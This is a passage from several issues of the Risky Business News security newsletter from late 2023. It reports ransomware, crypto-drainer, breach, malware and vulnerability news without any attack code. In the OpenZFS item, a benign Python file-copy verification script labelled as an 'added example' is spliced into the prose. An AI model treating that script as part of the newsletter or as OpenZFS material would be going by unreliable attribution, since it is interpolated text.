As for its activities, the gang has been extremely proficient. Its activity can be described as a mix of large pulses of attacks and periods of total quiet. In some months, Black Basta has been one of the Top 5 most active groups, while in others, they have been nowhere to be found, spurring rumors of a possible shutdown.

Some of the gang's biggest victims include UK outsourcing giant Capita, German arms manufacturer Rheinmetall, industrial automation company ABB, food retail giant Sobeys, and, more recently, the Toronto Public Library.

Elliptic and Corvus note that many of the gang's successful extortions were laundered through Garantex, a sanctioned Russian cryptocurrency exchange. The same exchange was previously used by the Conti gang to launder its funds as well.

Putting inaccurate estimates on ransomware gangs might sound like a waste of time, but these numbers often inform law enforcement agencies of the biggest threats they might want to target. So, let's keep them coming.

For technical reports on the Black Basta crew, visit their Malpedia page.

Screenshot of the Black Basta dark web leak site

Breaches, hacks, and security incidents

Okta data breach: Okta says that the hackers who breached its customer support system in October stole data on all its customers. The company says that some of its own employee information was also accessed. Initially, Okta said that only 1% of its customers had data stolen. The company is currently notifying all customers via email and asking organizations to enable MFA for their Okta admin accounts.

Staples incident: Office supply retail chain Staples took down some of its IT systems to contain a cybersecurity incident. The company says it is restoring affected systems, but the incident is affecting its ability to process and deliver orders via its official website. Staples did not say if it is facing a ransomware attack and directed customers to its stores for urgent orders. [h/t EoA]

JAXA hack: A threat actor has breached the Japan Aerospace Exploration Agency after exploiting a vulnerability in a network device. According to Japanese media, the hack took place over the summer, but JAXA didn't notice the intrusion and only recently learned of the breach from law enforcement. The agency says the hacked systems did not contain information on its rocket and space technology. [Additional coverage in Nippon]

Dollar Tree breach: The personal details of almost 2 million Dollar Tree users were stolen during a security breach at one of the retail chain's subcontractors. Dollar Tree is a Fortune 500 company that operates more than 15,000 discount-price stores across the US and Canada.

Capital Health incidents: A cybersecurity incident that took place during Thanksgiving is impacting the activities at hospitals operated by US provider Capital Health. Hospitals in New Jersey and Pennsylvania are experiencing network outages following the attack. The incident comes as hospitals owned by Ardent Health in six states are seeing similar issues.

KyberSwap hack: The hacker who stole $55 million (updated from $46 million) worth of crypto assets from the KyberSwap exchange posted their conditions for returning the stolen assets. The tl;dr is that they want the current leadership ousted and control over the entire platform, which is unlikely to happen.

Image via TheDEFIac/Twitter

General tech and privacy

Plex privacy disaster: Plex media server users are receiving "week in review" reports with what their friends have been watching on their devices. The reports have stirred quite a controversy, as they expose some users' porn preferences. [Additional coverage in 404 Media]

Rivian snafu: Car software maker Rivian fixed a buggy firmware update that bricked 3% of the company's infotainment systems. The company blamed the bug on a bad certificate. Rivian said it tested the firmware update on more than 1,000 vehicles before it went out, but the bug did not show up in tests. [Additional coverage in Electrek]

New meme TLD: Google has released a new .meme top-level domain. Let's hope they stick with it this time and don't dump it on another company like they did with .zip.

RETVec: Google has developed and provided more details on a system called RETVec that the company has been using inside Gmail to detect spam and malicious emails. The tool was also open-sourced on GitHub.

"RETVec is trained to be resilient against character-level manipulations including insertion, deletion, typos, homoglyphs, LEET substitution, and more. The RETVec model is trained on top of a novel character encoder which can encode all UTF-8 characters and words efficiently. Thus, RETVec works out-of-the-box on over 100 languages without the need for a lookup table or fixed vocabulary size."

WhatsApp Secret Code: Meta has rolled out a new feature named WhatsApp Secret Code that lets users lock and put sensitive conversations behind a password prompt.

"Secret code starts rolling out today, and in the coming months will be available globally."

Government, politics, and policy

CISA issues first SbD alert: CISA has published its first-ever "Secure by Design" alert. The first SbD document urges software vendors to take action and design more secure web management interfaces. CISA recommendations include disabling a product's web management interface by default and configuring products to stop operating when the web management interface is exposed on the internet. Umm... that's bold!

French govt bans foreign E2EE apps: France has banned government officials from using foreign encrypted messaging services like Telegram, Signal, and WhatsApp. The government is notifying ministers and their cabinet staff that they have to uninstall the apps from their devices by December 8. Instead, French officials have been told to use locally-developed alternatives like Tchap and Olvid. Officials cited privacy risks and a need to "advance towards greater French technological sovereignty." [Additional coverage in Le Figaro]

Spyware in Canada: Thirteen Canadian government agencies and federal departments have access to spyware and hacking tools, according to documents obtained by Radio-Canada. The list includes law enforcement agencies but also departments that deal with environmental protection, climate change, and natural resources. The tools have features that can recover and analyze data found on computers, tablets, and mobile phones. Some tools can recover data from cloud services, and some can recover encrypted and password-protected information. Suppliers include companies like Cellebrite, Magnet Forensics, and Grayshift. [Additional coverage in CBC]

Image via the CBC

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Corelight CEO Brian Dye about the value of data from NDR tools when it comes to long-term incident response.

Cybercrime and threat intel

HackingTeam founder arrested for attempted murder: The founder of the now-defunct spyware maker HackingTeam was arrested in Italy. David Vincenzetti was detained by authorities over the weekend after allegedly stabbing a family member. After rambling in court, a judge ordered Vincenzetti to be analyzed for mental health issues. [Additional coverage in TechCrunch]

SSNDOB admin sentenced: A US judge has sentenced a Ukrainian national to eight years in prison for running SSNDOB, an online marketplace that sold the personal information of more than 24 million Americans. Vitalii Chychasov was arrested in March 2022 while attempting to enter Hungary and was extradited to the US in July 2022 when the FBI also seized the SSNDOB portals. Officials say Chychasov made $19 million from running SSNDOB, which ran on five different domains.

Money launderer sentenced: A Florida judge has sentenced an Indian national to four years and three months in prison for laundering money for an Indian call center network. The call center network posed as IRS and FBI agents in a scheme that threatened US citizens with arrests unless they paid a fine to one of their accounts. Officials say Jignesh Purshottambhai Vekaria worked throughout 2018 to transfer funds collected in the US to his accomplices in India.

US seizes Sinbad mixer: The US government has sanctioned and seized Sinbad, a cryptocurrency mixing service. The service was used by North Korean hackers to launder funds stolen from cryptocurrency platforms like Horizon Bridge, Axie Infinity, Stake, FTX, BadgerDAO, CoinEx, and Atomic wallet owners. US officials say the service was also used to obfuscate transactions linked to sanctions evasion, drug trafficking, and the purchase of child sexual abuse materials. Sinbad launched in February this year and is believed to be a rebrand of Blender, another cryptocurrency mixing service. Blender was sanctioned by the US Treasury in May 2022, also for helping North Korean hackers launder stolen funds.

CISA warns of Unitronics exploitation: CISA is warning that a threat actor is most likely exploiting weak passwords to take control of Unitronics PLCs used in the US water management sector. The agency is asking organizations to enable MFA and remove the devices from the internet or place them behind a firewall. While CISA did not name the threat actor, they are most likely referring to an Iranian hacktivist group known as Cyber Av3ngers. The group hacked water pumps in the town of Aliquippa, Pennsylvania, last week after exploiting Unitronics PLCs.

Cactus Qlik exploitation: The Cactus ransomware gang is exploiting three vulnerabilities in Qlik Sense business analytics servers for initial access to corporate networks. All three vulnerabilities were discovered by security firm Praetorian and patched in August and September this year. Security firm ArcticWolf spotted the attacks on Qlik servers, which appear to have begun this week.

Rare Wolf: Russian security firm BI.ZONE looks at the tactics of Rare Wolf, a threat actor targeting Russian users and organizations.

Shadow/Comet/Twelve: Russian security firm FACCT analyzes a cybercrime group that has been known to go under different names, such as Shadow, Comet, and Twelve. The group is known for carrying out ransomware attacks on Russian companies. FACCT says the group's most recent victim is a factory of one of Russia's semiconductor companies.

ScamClub: Malwarebytes has detected a malvertising campaign orchestrated by the ScamClub threat actor that managed to plant malicious ads on respectable sites like the Associated Press, ESPN, and CBS.

Malware technical reports

Mobile spyware cluster: Symantec looks at an Android spyware cluster. No details on whose malware this is.

FjordPhantom: Promon has discovered a new Android banking trojan named FjordPhantom that uses virtualization apps to create virtual containers and hide its malicious behavior from security tools. The malware is currently being spread through messaging spam and targets users in Southeast Asia.

Qakbot servers: Embee researchers have identified 83 servers that are part of the Qakbot botnet infrastructure. Authorities took down the botnet earlier this year, and it's unclear if the 83 servers are part of the gang's new infrastructure or leftovers from the old one. From the detection timestamps on Qakbot malware samples, they seem to be new infrastructure (but don't take my word on it since I'm an idiot about these things).

ScrubCrypt: Human has published an analysis of a recent RedLine stealer campaign employing the ScrubCrypt obfuscator.

Nova: Since September, a new infostealer named Nova has been advertised on the cybercriminal underground.

Serpent: K7 researchers look at Serpent, a new .NET infostealer currently advertised on underground hacking forums.

GoTitan botnet: Fortinet has discovered a new botnet named GoTitan that is currently exploiting a recently disclosed Apache ActiveMQ vulnerability tracked as CVE-2023-46604.

Lockbit ransomware: Chinese security firm Antiy looks at Lockbit, the ransomware gang that attacked the Industrial and Commercial Bank of China.

Cactus ransomware: Logpoint researchers have published a technical analysis of the Cactus ransomware.

Xaro ransomware: Cybereason researchers have spotted a new version of the DejaVu ransomware that they are tracking under the name of Xaro. The ransomware is currently distributed via booby-trapped freeware apps.

Sponsor Section

This week's Risky Business newsletters are brought to you by Corelight. They maintain the open-source Zeek network security sensor/monitor. They also make very good commercial products in the network security space. Check them out at Corelight.com, or watch this video about why you need NDR as well as EDR.

APTs, cyber-espionage, and info-ops

Kimsuky: AhnLab published a report on a Kimsuky operation targeting South Korean research institutes.

DPRK crypto-heists: Recorded Future published a report on North Korea's cryptocurrency heists. The report does a good job at putting the size of these operations in context.

"North Korean threat actors were accused of stealing an estimated $1.7 billion worth of cryptocurrency in 2022 alone, a sum equivalent to approximately 5% of North Korea’s economy or 45% of its military budget. This amount is also almost 10 times more than the value of North Korea's exports in 2021, which sat at $182 million, according to the Observatory of Economic Complexity (OEC)."

SugarGh0st RAT: A suspected Chinese threat actor is targeting South Korea and Uzbekistan with SugarGh0st RAT, a modification of the open-source Gh0st RAT malware.

Patchwork: QiAnXin has published a report on the Patchwork APT (APT-Q-36) and its recent campaigns involving the Remcos and Spyder malware.

UAC-0050: Ukraine's CERT team is warning about a series of attacks against government agencies trying to install the Remcos RAT. The agency attributed the attacks to UAC-0050, a threat actor it's been tracking since 2020. Similar attacks were spotted in February and November as well.

Hellhounds: Russian security firm Positive Technologies says that a threat actor named Hellhounds has been conducting intrusions against Russian organizations. PT linked the group to at least 20 intrusions and said Hellhounds hacked and destroyed infrastructure at a Russian telecom operator. Described by the Russian telco as the "Thanos Click" [PDF], the incident resulted in the destruction of customer and billing databases and a day-long outage for the company's customers.

Meta blind to new info-ops: Meta says it's having an increasingly harder time spotting foreign inauthentic coordinated campaigns since US judges have barred US government agencies from interacting with the company. Meta head of security Nathaniel Gleicher says the company has not received any new information from US government agencies since July. Meta's statements come as the company published its quarterly threat report for Q3 2023, which includes information on three major influence operations, two of Chinese origin and one from Russia. [Additional coverage in CyberScoop / Meta report PDF]

Vulnerabilities, security research, and bug bounty

ownCloud vulnerability: GreyNoise has published an analysis of CVE-2023-49103, a recently patched ownCloud vulnerability that is being exploited in the wild. The report concludes that some strict conditions must be met for the vulnerability to be exploitable in the wild.

Splunk vulnerability: Uptycs has published an analysis of CVE-2023-46214, an RCE in Splunk's SIEM for which a PoC was published this week.

Zyxel security updates: Zyxel has published two waves of security updates this week to fix 15 vulnerabilities across its firewall and NAS products.

LogoFAIL: Binarly researchers have discovered a set of security vulnerabilities in image parsing libraries that are included with BIOS firmware. Named LogoFAIL, the vulnerabilities exploit a feature of BIOS firmware that allows companies to add their logo to a PC's boot-up screen. Binarly says many of these libraries are vulnerable and allow threat actors to upload malformed logo images inside the BIOS and execute malicious code to bypass Secure Boot and take over devices. Binarly says the LogoFAIL vulnerabilities can be exploited on x86 or ARM-based devices from companies like Intel, Acer, and Lenovo. It also impacts UEFI firmware produced by AMI, Insyde, and Phoenix.

Apple zero-days: Apple has patched two WebKit zero-days that were exploited in the wild. The two are tracked as CVE-2023-42916 and CVE-2023-42917. Updates are available for both iOS and macOS.

Infosec industry

Google cybersecurity training: Google announced a $10 million investment in cybersecurity training programs across Europe. The program will provide universities with a cybersecurity training program and curriculum for their students. Eight universities in eight different European countries will receive funding of up to $1 million to get their cybersecurity courses started. Other universities can also apply. Google launched a center in Malaga, Spain, to coordinate the effort and will be working with the European Cyber Conflict Research Incubator CIC, a UK-based non-profit. Earlier this year, Google also committed more than $20 million to the creation of cybersecurity clinics at 20 higher education institutions across the US.

New tool—AWS Kill Switch: Robinhood security engineer Jeffrey Lyon has open-sourced AWS Kill Switch, a tool that can be used during security incidents to delete or contain other AWS accounts.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the latest Russian cyber attacks on the Ukrainian energy grid.

Risky Biz News: Crypto-phishing service shuts down after stealing $71 million

29 November 2023 at 00:30

This newsletter is brought to you by Corelight. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

A phishing platform specialized in cryptocurrency thefts has shut down operations after stealing more than $71 million over the past nine months.

Named Inferno Drainer, the platform launched in February this year.

Spotted by Web3 security platform ScamSniffer, the service allowed threat actors to create phishing pages for more than 220 cryptocurrency brands.

Threat actors would create phishing pages through the service, they would lure users to the sites, and Inferno Drainer would automate the hacking and draining of victims' crypto wallets. For its troubles, Inferno Drainer would keep 20% of the funds, while its "customers" got the rest.

ScamSniffer researchers say Inferno Drainer was responsible for more than 10,000 phishing sites and helped hackers steal cryptocurrency from more than 103,000 victims since its launch.

The service is the perfect definition of a modern-day cybercrime offering. It was offered, advertised, and managed solely through Telegram; it provided a dumbed-down point-and-click interface for low-skilled threat actors; and pulled the plug on its operations as soon as it had a few big hacks (in August and November this year).

Although the Inferno Drainer administrator is claiming they are shutting down, there is an extremely high chance another wallet-draining service will pop out of the blue in the coming weeks.

Rebranding and name changes are more common tactics in underground cybercrime than they are with Microsoft cloud and security products.

Inferno Drainer is the second crypto-phishing service to shut down this year after Monkey Drainer, which shuttered operations in March.

Image via Only1temmy

Breaches, hacks, and security incidents

Ardent ransomware attack: Hospitals owned by Ardent Health are redirecting patients and ambulances to nearby emergency rooms after a ransomware attack crippled the healthcare provider's operations. The incident took place last week, on Thanksgiving Day. Ardent Health says it shut down its IT network to contain the damage. The attack and the resulting IT outage impacted Ardent Health hospitals in Idaho, Oklahoma, New Mexico, Texas, Kansas, and New Jersey—all the states where the company operates. [Additional coverage in NBC, CNN]

Ethyrial ransomware attack: A ransomware attack that hit gaming company Gellyberry Studios has destroyed user accounts and in-game inventory for the "Ethyrial: Echoes of Yore" game. Because the game was still in an early alpha release and testing phase, only 17,000 user accounts were affected by the incident. The company says it's restoring from a previous backup and will not pay the attackers for a decryption key. It said it learned from the attack and will now back up its servers more often. [Additional coverage in Hot for Security]

Line data breach: The company behind the Line instant messaging service disclosed a security breach [PDF] after a hacker stole the personal data of 440,000 users. LY Corp says the breach originated at one of its subcontractors at the start of October. The company says the hacker infected the computer of one of its subcontractors and then pivoted to its network. More than 300,000 of the 440,000 stolen records are directly related to the Line app. [Additional coverage in Kyodo News]

Aliquippa water utility hack: Officials from Aliquippa, Pennsylvania, have confirmed that an Iranian hacktivist group took control of water booster stations operated by the town's water authority. A group known as Cyber Av3ngers took credit for the hacks last week in a series of Telegram posts. The booster stations were manufactured by Unitronics and were used in Aliquippa to monitor and regulate water pressure. [Additional coverage in CBS]

Taj Hotels breach: The data of 1.5 million customers who stayed at luxury hotel chain Taj Hotels is being sold on an underground forum. [Additional coverage in the India Times]

Pegasus in Serbia: Citizen Lab, Amnesty International, and AccessNow came out to support the SHARE Foundation's conclusion from last week that traces of the Pegasus spyware were found on the devices of two members of the Serbian civil society.

"These attacks, which occurred approximately one minute apart from each other on or about August 16, 2023, leveraged the iOS HomeKit iPhone functionality. The tactics are consistent with those previously used by NSO Group's Pegasus spyware, although given limited available forensic indicators on the targeted devices, we cannot confirm the exact type of spyware used in this attack."

DIMC hack: Pro-Ukrainian hacktivist group Cyber Resistance has hacked and leaked data from the Department of Information and Mass Communications of the Russian Ministry of Defense (DIMC). The leaks contain reports compiled by the DIMC showing an obsession of the Russian government about how the Russian Army and the Ukrainian war are covered in both internal and external media. The report also covers KATYUSHA, a platform used by the DIMC to monitor online media. [Additional coverage in InformNapalm]

"We wonder who proofreads all this, because at times the texts look really cringy. It seems that Russian propagandists themselves do not read very closely into what they write. For example, they call their military personnel “military prisoners” [Ed.: “военнопленные” instead of “военнослужащие”]."

General tech and privacy

Google Drive data loss: Google is investigating reports that some Drive users have lost all their recent files as far back as May 2023. Missing files don't appear in the trash folder, in past revisions, or in the web version. [Additional coverage in Android Police]

OpenZFS data corruption bug: Speaking of data corruption, there's a bug in the OpenZFS file storage system that corrupts files when copied.

"OpenZFS through 2.1.13 and 2.2.x through 2.2.1, in certain scenarios involving applications that try to rely on efficient copying of file data, can replace file contents with zero-valued bytes."
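As an added, defender-side example (not OpenZFS project code), the following Python script compares a copy against its source block by block and reports the runs the copy has filled with zeros where the source held data, which is the symptom the CVE text describes; the 4 KiB block size and the sample data are assumptions.

```python
# Added example, not OpenZFS code: verify a copied file against its source and
# report regions the copy has zero-filled where the source had data.
from dataclasses import dataclass
from pathlib import Path

BLOCK = 4096  # assumed comparison granularity; real ZFS recordsizes vary


@dataclass
class ZeroedRegion:
    offset: int  # byte offset where the zero-filled run starts
    length: int  # length of the run in bytes


def find_zeroed_regions(source: bytes, copy: bytes, block: int = BLOCK) -> list[ZeroedRegion]:
    """Return merged regions where `copy` is all zeros but `source` differs.

    Blocks that differ without being all-zero are ordinary corruption and are
    not reported here; `compare_bytes` counts them separately.
    """
    if len(source) != len(copy):
        raise ValueError(f"length mismatch: source={len(source)} copy={len(copy)}")
    regions: list[ZeroedRegion] = []
    for off in range(0, len(source), block):
        src, dst = source[off:off + block], copy[off:off + block]
        if src == dst or any(dst):  # identical block, or not a zero-filled one
            continue
        if regions and regions[-1].offset + regions[-1].length == off:
            regions[-1].length += len(dst)  # extend the previous run
        else:
            regions.append(ZeroedRegion(off, len(dst)))
    return regions


def compare_bytes(source: bytes, copy: bytes, block: int = BLOCK) -> dict:
    """Summarise how a copy differs from its source."""
    zeroed = find_zeroed_regions(source, copy, block)
    other_bad = sum(
        1
        for off in range(0, len(source), block)
        if source[off:off + block] != copy[off:off + block]
        and any(copy[off:off + block])
    )
    return {"identical": source == copy, "zeroed_regions": zeroed, "other_bad_blocks": other_bad}


def verify_copy(source_path: str, copy_path: str, block: int = BLOCK) -> dict:
    """File-based wrapper: read both files fully and compare them."""
    return compare_bytes(Path(source_path).read_bytes(), Path(copy_path).read_bytes(), block)


def _constructed_sample() -> tuple[bytes, bytes]:
    """Constructed sample: a 4-block source (no zero bytes) and a copy with blocks 1-2 zeroed."""
    source = bytes((i * 7 + 3) % 251 + 1 for i in range(4 * BLOCK))
    copy = source[:BLOCK] + b"\x00" * (2 * BLOCK) + source[3 * BLOCK:]
    return source, copy


if __name__ == "__main__":
    src, cp = _constructed_sample()
    print(compare_bytes(src, cp))
```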

Microsoft Defender Application Guard for Office: Microsoft has deprecated the Application Guard for Office. The feature only lasted four years.

Meta complaint in the EU: European privacy watchdog noyb has filed a complaint with the Austrian data protection agency against social media company Meta. Noyb says Meta's new tactic of charging EU users €9.99/month to not track them online is against the EU GDPR. The organization argues that users have a fundamental right to privacy and they shouldn't pay to stop psychopathic tech bros from following their every move online. I may or may not have added the "psychopathic tech bros" part.

NAFO and Truth Social: Wired looks at NAFO's trolling and its attempts to sabotage Trump's Truth Social social media platform.

Telegram's fake bans: Wired also looks at how inefficient Telegram's channel banning system is and how content shared on those channels often makes its way out and spreads on the platform anyway.

Monzo anti-fraud feature: Something we missed back in September was this new feature added to the Monzo app that shows when a customer support agent is on the phone with a customer. Monzo says this feature can be used to determine when a customer may be getting scammed or when he's actually speaking to a legitimate Monzo customer support agent.

Government, politics, and policy

Ukraine takes credit for Rosaviatsiya hack: The Ukrainian government says it hacked Russian civil aviation agency Rosaviatsiya. Ukraine's Defence Intelligence Main Directorate says it obtained "a large volume of confidential documents" following a "complex special operation in cyberspace." Ukrainian officials claim the stolen documents show the dire state of the Russian aviation sector as a result of Western sanctions. According to screenshots posted by the agency, the most recent document is dated August 2023. Rosaviatsiya disclosed a hack in March 2022, although it's unclear if this is the incident referenced by Ukrainian officials. [h/t Oleg Shakirov]

Ukraine cyber corruption probe: A Ukraine court has ordered the arrest of Viktor Zhora, the ex-deputy head of Ukraine's State Service for Special Communications and Information Protection (SSSCIP). Zhora was fired last week together with former SSSCIP head Yurii Shchyhol. Both are accused of participating in a scheme to contract software at inflated prices. Shchyhol was arrested last week. Both officials are now out on bail. [Additional coverage in The Record]

FISA reform legislation, part 2: After an earlier effort this month through the Government Surveillance Reform Act, we now have a second bill attempting to restore US surveillance powers under Section 702 of the Foreign Intelligence Surveillance Act. This one is spearheaded by Senators Warner, Rubio, Graham, Wicker, Collins, King, Bennet, Casey, Gillibrand, Rounds, Kelly, Klobuchar, Moran, Lankford, and Whitehouse. Compared to the privacy-friendly first act, this one is more lenient and removes an FBI warrant requirement. [Additional coverage in The Record]

ASD Essential Eight update: The Australian Signals Directorate has updated the Essential Eight Maturity Model, a set of eight basic cybersecurity recommendations the agency initially published in 2017. The ASD says the update takes into consideration changes to the threat landscape. The update includes new recommendations such as applying security patches within 48 hours, using PowerShell logging, uninstalling Internet Explorer, and clarifications on the proper way of using MFA. An overview of all the other changes is available here.

AI development guidance: Cybersecurity and government agencies from 18 countries have published joint guidance on how to develop safe and secure AI systems. The guidance targets developers and academics, contains general recommendations, and is non-binding. The document was put together by CISA and the UK NCSC, with input from the agencies listed below.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Corelight CEO Brian Dye about the value of data from NDR tools when it comes to long-term incident response.

Cybercrime and threat intel

Ransomware gang detained in Ukraine: Ukrainian authorities have detained five members of a cybercrime group that carried out more than 1,800 ransomware attacks across 71 countries. The group's leader and four accomplices were detained following searches at 30 locations across Ukraine. Officials say the group worked as an affiliate for larger ransomware operations and deployed ransomware strains such as LockerGoga, MegaCortex, Hive, and Dharma. The suspects are believed to be connected to a group of 12 suspects detained in June 2021 in connection to the LockerGoga gang. [Press releases: Europol, Eurojust, Ukraine Cyber Police, Ukraine National Police]

SIM swapper sentenced: A US judge has sentenced a 24-year-old from LA to 96 months in prison for SIM-swapping Instagram social media influencers, along with other crimes.

USiSLookups: A Telegram channel named USiSLookups is providing access to US Social Security information for prices ranging from $8 to $40. According to infosec reporter Brian Krebs, the data appears to come from US consumer data broker USinfoSearch, most likely via compromised USinfoSearch accounts.

Malware technical reports

Banking trojans in Iran: Zimperium has more details on a campaign spotted by Sophos that used mobile banking trojans to target Iranian banking users earlier this year. It appears the campaign is still ongoing and evolving.

RisePro: ANY.RUN researchers have published an analysis of RisePro, an infostealer that launched in 2022 as a MaaS.

LostTrust ransomware: ShadowStackRE has published an analysis of LostTrust, a ransomware operation that launched in September this year and quickly became one of the most prolific groups around, making the Top 5 most active groups in October.

Sponsor Section

This week's Risky Business newsletters are brought to you by Corelight. They maintain the open-source Zeek network security sensor/monitor. They also make very good commercial products in the network security space. Check them out at Corelight.com, or watch this video about why you need NDR as well as EDR.

APTs, cyber-espionage, and info-ops

WildCard APT: Intezer researchers have linked the SysJocker, a sophisticated Linux and Windows backdoor, to an APT group they are calling WildCard. Spotted in late 2021 and recently rewritten in Rust, the malware has been linked to a "Hamas-affiliated APT" by fellow Israeli cybersecurity firm Check Point. While Intezer has not made the same attribution, the company did say SysJocker is linked to the current threat landscape surrounding the ongoing Israeli-Hamas war. In an interview, Intezer called the WildCard APT "unusually mature for the Israeli threat landscape."

Andariel: AhnLab says North Korean cyber-espionage group Andariel has jumped on the bandwagon of Apache ActiveMQ exploitation (via CVE-2023-46604). The final payloads are the NukeSped and TigerRat backdoors.

DPRK macOS campaigns: SentinelOne looks at a recent DPRK-linked malware campaign targeting macOS users with the RustBucket and KandyKorn malware strains.

Vulnerabilities, security research, and bug bounty

Chrome zero-day: Google has released security updates for its Chrome browser. The company says that a vulnerability tracked as CVE-2023-6345 is being exploited in the wild.

Ray vulnerabilities: Bishop Fox researchers have discovered a series of vulnerabilities in Ray, an open-source unified compute framework.

Chamilo LMS vulnerabilities: Starlabs researchers have discovered ten vulnerabilities in the Chamilo LMS, including several pre-auth RCEs.

Splunk PoC: A proof-of-concept has been released for CVE-2023-46214, an RCE in Splunk Enterprise that was patched earlier this month.

BLUFFS attack: A team of academics from Europe has published details on BLUFFS, a collection of six attacks against the Bluetooth protocol's future and forward secrecy mechanism. Tracked as CVE-2023-24023, the attacks can force devices paired in a secure connection to use legacy encryption schemes with short and weak encryption keys. This allows attackers to expose Bluetooth devices communicating in the Secure Connections mode to man-in-the-middle (MitM) attacks. The maintainers of the Bluetooth standard have confirmed the BLUFFS attacks and published recommendations for vendors.

ownCloud exploitation: Multiple threat actors are scanning the internet for ownCloud file-sharing servers to exploit a recently patched vulnerability. Tracked as CVE-2023-49103, the security bug has a severity rating of 10/10 and can be used to leak admin passwords and mail server credentials for ownCloud installations. Exploitation has been spotted and independently confirmed by GreyNoise, SANS ISC, and the Shadowserver Foundation. According to the latter, there are more than 11,000 ownCloud servers currently connected to the internet. ownCloud released a security update last week.

Infosec industry

New tool—Have I Been Squatted: Security researcher Juxhin has put together a tool named Have I Been Squatted that checks if a domain is being typosquatted. [h/t Ian Muscat]

New tool—IceKube: Security firm WithSecure has open-sourced a tool named IceKube that can find attack paths within a Kubernetes cluster from a low-privileged starting point to a preferred location, typically cluster-admin.

New tool—CVSS-BT: Security researcher Stephen Shaffer has open-sourced CVSS-BT, a tool to enrich NVD CVSS scores with temporal & threat metrics. [h/t Patrick Garrity]

New tool—DeleFriend: Security firm Hunters has open-sourced a tool named DeleFriend that can perform GCP domain-wide delegation abuse and access Workspace user data via GCP service accounts. Bell's Clément Cruchet has a similar tool out named Delegate.

OpenSSF guide: The Open Source Security Foundation (OpenSSF) has published a guide on how open-source projects can become a CVE numbering authority (CNA).

AT&T to enter MSSP market: US telco giant AT&T will enter the managed security service providers (MSSP) market. The company plans to enter a joint venture with WillJam Ventures and create a standalone MSSP division in the first quarter of 2024.

AWS re:Invent 2023: Live streams from the Amazon re:Invent conference are available on the AWS Events YouTube account.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the latest Russian cyber attacks on the Ukrainian energy grid.

Risky Biz News: Cyber insurance catches on across the EU

27 November 2023 at 00:30

This newsletter is brought to you by Corelight. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

An ENISA report on NIS compliance spending has found that roughly 42% of the EU's critical infrastructure and digital service provider operators had signed up for cyber insurance in 2022.

The report notes that while cyber insurance coverage was at 43% in 2020 and just 30% in 2021, the cyber insurance market now appears to be active and developed all over the EU.

Last year, organizations in all member states signed up for cyber insurance, whereas in previous years most of the coverage was clustered in just a handful of member states.

The report is based on data from 1,080 OES or DSP organizations across all 27 member states. OES stands for Operators of Essential Services and is the EU's term for critical infrastructure operators, like healthcare, water, energy, transport, and the like. DSP stands for Digital Service Providers and includes all the large service providers that have more than 50 staff and an annual balance sheet of over €10 million.

Put together by ENISA—the EU's cybersecurity agency—the report looks at how major companies and critical infrastructure operators are investing in complying with the EU's NIS directive. The directive mandates that larger organizations reasonably secure their networks against cyberattacks and report larger cybersecurity incidents to national regulators.

Ever since it passed in 2016, NIS compliance has revolved around companies setting up robust cybersecurity defenses and having the proper tools and systems for dealing with and reporting incidents efficiently.

Whether companies started from scratch or already had in-house security teams, NIS compliance has typically come with its own budgeting load.

Since budgets are easier to quantify than other NIS compliance work, ENISA has been surveying the market every year to see how EU organizations have approached the problem.

In 2022, ENISA says that organizations allocated €83.6 million to IT spending on average, of which €5.1 million went to information security spending.

Cybersecurity spending increased by 0.4% from the previous year, suggesting companies have found their sweet spot.

The same trend was also seen in employment figures, with organizations allocating 11.9% of their IT staff to cybersecurity operations, a number down 0.1% from the 12% recorded in 2021.

Around 47% of companies also said they don't have any plans to hire new cybersecurity staff in the next two years, again confirming the market has found its sweet spot in terms of budgeting and staffing.

However, with NIS2 set to replace the old NIS throughout the next two years, cybersecurity is now again a top spending target for EU organizations, and by a very large margin.

Breaches, hacks, and security incidents

Credit union hacks: A hacking group named N4ughtySecTU has hacked and is extorting TransUnion and Experian, two of South Africa's largest consumer credit reporting agencies. The group is asking for $30 million from each, threatening to release their customers' data online. This is the second time the N4ughtySecTU group has hacked TransUnion, after it deployed ransomware on its network in March 2022. The group is believed to operate out of Brazil. [Additional coverage in TimesLIVE]

CTS cyber-attack: A cyberattack on a shared IT service provider is impacting the activities of more than 80 UK law firms involved with the real estate market. The attack has hit CTS, a Cheshire-based company that provides cloud hosting and IT solutions for law firms in the UK and Ireland. The Telegraph reports the company fell victim to the recent wave of CitrixBleed attacks carried out by the LockBit ransomware group. Ever since the attack last Wednesday, some UK law firms have been unable to complete real estate conveyancing transactions. [Additional coverage in The Telegraph/non-paywall]

HSE cyber-attack: A cyberattack has hit the IT network of HSE, Slovenia's largest power utility. The company says the incident was the result of a "crypto-virus" that encrypted files and locked staff out of its systems. HSE says it has not received any ransom request and that the incident did not impact activity at any of its power plants. [Additional coverage in STA and 24ur] [h/t Amadej Papež]

Gulf Air data breach: Bahrain-based airline Gulf Air says it suffered a security breach during which an unidentified threat actor might have gained access to customer data. Gulf Air says critical systems and flight operations were not affected by the incident. [Additional coverage in BNA]

New Relic incident: Web tracking and analytics company New Relic is investigating a security breach of its infrastructure. The company did not share any details on the exact nature of the incident. New Relic says it will directly contact each affected customer if their data was impacted by the breach. [h/t Scrantic]

Justin Sun crypto-heists: Two cryptocurrency exchanges linked to blockchain entrepreneur Justin Sun suffered security incidents last week, resulting in an estimated loss of $115 million worth of assets. Hackers stole $85 million from Heco Chain and another $30 million from HTX. This marks the second time HTX got hacked in two months after the platform also lost $8 million in a hack at the end of September. Sun promised to compensate all affected users. [Additional coverage in CNBC]

KyberSwap crypto-heist: A hacker has breached the network of cryptocurrency trading platform KyberSwap and stolen $46 million worth of assets. The company confirmed the hack and urged users to withdraw funds from the platform. KyberSwap has offered the hacker the possibility of keeping 10% of the stolen funds as a "bug bounty reward," but five days later, the funds have yet to be returned. This is the company's second hack after it lost $265,000 in September 2022. [Additional coverage in CoinTelegraph]

Government, politics, and policy

